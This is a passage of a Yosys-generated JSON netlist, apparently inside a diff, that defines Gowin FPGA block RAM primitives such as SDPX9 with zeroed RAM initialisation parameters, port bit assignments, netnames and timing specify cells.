"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "CLKA": { + "direction": "input", + "bits": [ 2 ] + }, + "CEA": { + "direction": "input", + "bits": [ 3 ] + }, + "CLKB": { + "direction": "input", + "bits": [ 4 ] + }, + "CEB": { + "direction": "input", + "bits": [ 5 ] + }, + "OCE": { + "direction": "input", + "bits": [ 6 ] + }, + "RESETA": { + "direction": "input", + "bits": [ 7 ] + }, + "RESETB": { + "direction": "input", + "bits": [ 8 ] + }, + "ADA": { + "direction": "input", + "bits": [ 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22 ] + }, + "ADB": { + "direction": "input", + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36 ] + }, + "DI": { + "direction": "input", + "bits": [ 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68 ] + }, + "BLKSELA": { + "direction": "input", + "bits": [ 69, 70, 71 ] + }, + "BLKSELB": { + "direction": "input", + "bits": [ 72, 73, 74 ] + }, + "DO": { + "direction": "output", + "bits": [ 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106 ] + } + }, + "cells": { + }, + "netnames": { + "ADA": { + "hide_name": 0, + "bits": [ 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:896.14-896.17" + } + }, + "ADB": { + "hide_name": 0, + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:896.19-896.22" + } + }, + "BLKSELA": { + "hide_name": 0, + "bits": [ 69, 70, 71 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:898.13-898.20" + } + }, + "BLKSELB": { + "hide_name": 0, + "bits": [ 72, 73, 74 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:898.22-898.29" + } + }, + "CEA": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:893.13-893.16" + } + }, + "CEB": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:893.24-893.27" + } + }, + "CLKA": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:893.7-893.11" + } + }, + "CLKB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:893.18-893.22" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:897.14-897.16" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:899.15-899.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:894.7-894.10" + } + }, + "RESETA": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:895.7-895.13" + } + }, + "RESETB": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:895.15-895.21" + } + } + } + }, + "SDPX9": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1539.1-1637.10" + }, + "parameter_default_values": { + "BIT_WIDTH_0": "00000000000000000000000000100100", + "BIT_WIDTH_1": "00000000000000000000000000100100", + "BLK_SEL": "000", + "INIT_RAM_00": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "DO": { + "direction": "output", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ] + }, + "DI": { + "direction": "input", + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 74, 75, 76 ] + }, + "ADA": { + "direction": "input", + "bits": [ 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90 ] + }, + "ADB": { + "direction": "input", + "bits": [ 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104 ] + }, + "WREA": { + "direction": "input", + "bits": [ 105 ] + }, + "WREB": { + "direction": "input", + "bits": [ 106 ] + }, + "CLKA": { + "direction": "input", + "bits": [ 107 ] + }, + "CLKB": { + "direction": "input", + "bits": [ 108 ] + }, + "CEA": { + "direction": "input", + "bits": [ 109 ] + }, + "CEB": { + "direction": "input", + "bits": [ 110 ] + }, + "OCE": { + "direction": "input", + "bits": [ 111 ] + }, + "RESETA": { + "direction": "input", + "bits": [ 112 ] + }, + "RESETB": { + "direction": "input", + "bits": [ 113 ] + } + }, + "cells": { + "$specify$194": { + "hide_name": 1, + "type": "$specify3", + "parameters": { + "DAT_DST_PEN": "0", + "DAT_DST_POL": "0", + "DST_WIDTH": "00000000000000000000000000100100", + "EDGE_EN": "1", + "EDGE_POL": "1", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000111101101", + "T_FALL_MIN": "00000000000000000000000111101101", + "T_FALL_TYP": "00000000000000000000000111101101", + 